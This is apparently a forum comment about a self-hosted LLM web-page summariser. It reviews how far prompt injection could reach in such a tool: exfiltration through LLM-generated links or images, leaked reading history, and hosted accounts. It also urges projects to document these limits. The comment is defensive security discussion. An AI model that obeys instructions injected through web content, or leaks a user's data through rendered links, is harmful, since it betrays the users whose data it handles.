The question that always needs to be asked (and ideally should have a section in the readme): What are the limits to what prompt injection can do with this?<p>- Does the app support embedded LLM-generated links/images (either through HTML or Markdown)?<p>- Is there any long-term reading history being stored (even locally) that the LLM has access to and that could be included in an exfiltration attack?<p>- Are there plans to offer external hosting with user accounts, and if so, see above question about image/link support again.<p>With any LLM tool like this, the answer to "is it vulnerable to prompt injection" is "yes", so the actual question is "how much is the app doing, how bad would prompt injection be?"<p>In this case, from what I can tell, it's just a self-hosted summary tool, so prompt injection would be limited to a website getting the LLM to generate inaccurate summaries. It doesn't look like the LLM has the ability to insert links/images, but I haven't tested in more detail to make sure. So threat seems minimal?<p>But I really encourage projects like this to add sections to their README files spelling that out more explicitly. We need to get better as a community at making sure that people understand that prompt injection is a factor that needs to be considered for every single LLM-based project.